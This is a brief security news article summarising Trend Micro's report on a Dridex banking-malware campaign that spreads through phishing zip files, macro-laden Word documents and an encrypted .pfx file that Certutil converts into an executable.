Custom Dridex malware disguises itself as a certificate

A new form of Dridex malware appears to be mainly active in America after a short period of inactivity. The malware distributed via spam pretends to be a certificate to evade detection.

In a blog post, security firm Trend Micro describes the spam email masquerading as a notification that an unauthorized attempt to access an unspecified account has occurred. It also states an IP address from which the attempt would originate, to give the impression of a legitimate message.

The email prompts the user to open a zip file to read a full report of the ‘incident’. Once extracted, the file contains a blank Word document, which prompts the user to enable macros to view its contents. If the user does this, infection takes place. Infection via macros is not new and is a common way of spreading malware.

According to Trend Micro, however, it is striking that in addition to macros, a pfx file is also used, which ends up on the system when extracting the zip archive. These types of files normally contain information about public and secret keys in the context of certificate transfer. The pfx file is encrypted and is converted into an executable exe file by the Windows component Certutil, after which infection occurs.

The disguise as a pfx file makes the malicious software more difficult to detect and counter, Trend Micro writes. Dridex malware is mainly aimed at extracting financial information, for example login details for internet banking. The use of pfx files shows, according to the security company, that the development of the malware is still in progress.